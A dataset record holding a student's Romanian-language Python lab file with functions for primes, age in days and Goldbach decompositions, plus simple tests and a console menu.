[ { "alpha_fraction": 0.5410627722740173, "alphanum_fraction": 0.5696457624435425, "avg_line_length": 33.98591613769531, "blob_id": "bdb400ca991838e102f02781f71478838d42aa50", "content_id": "405f1cb0b1226d8d1e6e09cee2d2a16a9003b5d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2494, "license_type": "no_license", "max_line_length": 103, "num_lines": 71, "path": "/main.py", "repo_name": "AP-MI-2021/lab-2-andreeabejinariu0", "src_encoding": "UTF-8", "text": "'''\nGăsește ultimul număr prim mai mic decât un număr dat.\n'''\ndef prime(nr):\n if nr < 2:\n return False\n for i in range (2 , nr):\n if nr % i == 0:\n return False\n return True\ndef get_largest_prime_below (nr):\n for i in range (nr-1, 1, -1):\n if prime(i) == True:\n return i\n break\n return False\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(15) == 13\n assert get_largest_prime_below(112) == 109\n assert get_largest_prime_below(41) == 37\n assert get_largest_prime_below(225) == 223\n assert get_largest_prime_below(-4) == False\n\nfrom datetime import datetime as dt\ndef get_age_in_days(birthdate):\n data2 = dt.today().strftime('%d/%m/%Y') #converteste data de azi\n birthdate = dt.strptime(birthdate, '%d/%m/%Y')#converteste data de nastere intr-un sir de caractere\n azi = dt.strptime(data2, '%d/%m/%Y')\n zile = birthdate - azi#diferenta de zile\n return (abs(zile.days))#diferenta in modul exprimata in zile\ndef get_goldbach(n):\n if n % 2 == 1:\n return None\n for p1 in range(1, n // 2, +2):\n if prime(p1):\n p2 = n - p1\n if prime(p2):\n return p1, p2\n break\ndef test_get_goldbach():\n assert get_goldbach(18) == (5 , 13)\n assert get_goldbach(14) == (3, 11)\n assert get_goldbach(42) ==(5, 37)\n assert get_goldbach(20) == (3, 17)\n assert get_goldbach(45) == None\ndef main():\n while True:\n print('1. Găsește ultimul număr prim mai mic decât un număr dat.')\n print('2. Varsta persoanei in zile')\n print('3. 
Conjunctura lui Goldbach')\n print('x. Iesirea din program - exit')\n optiune = input('Alege optiunea: ')\n if optiune == '1':\n nr = int(input('Dati un numar: '))\n if get_largest_prime_below(nr):\n print(f'Ultimul numar prim mai mic decat {nr} este ',get_largest_prime_below(nr))\n else:\n print(f'Nu exsita numar prim mai mic decat {nr}.')\n elif optiune == '2':\n data1 = str(input(\"Introduceti data nasterii: (dd/mm/yyyy)\"))\n print('Numarul zilelor este de ',get_age_in_days(data1))\n elif optiune == '3':\n n = int(input('Dati un numar: '))\n print(get_goldbach(n))\n elif optiune == 'x':\n break\n else:\n print('Optiune invalida!')\ntest_get_largest_prime_below()\ntest_get_goldbach()\nmain()\n" } ]
1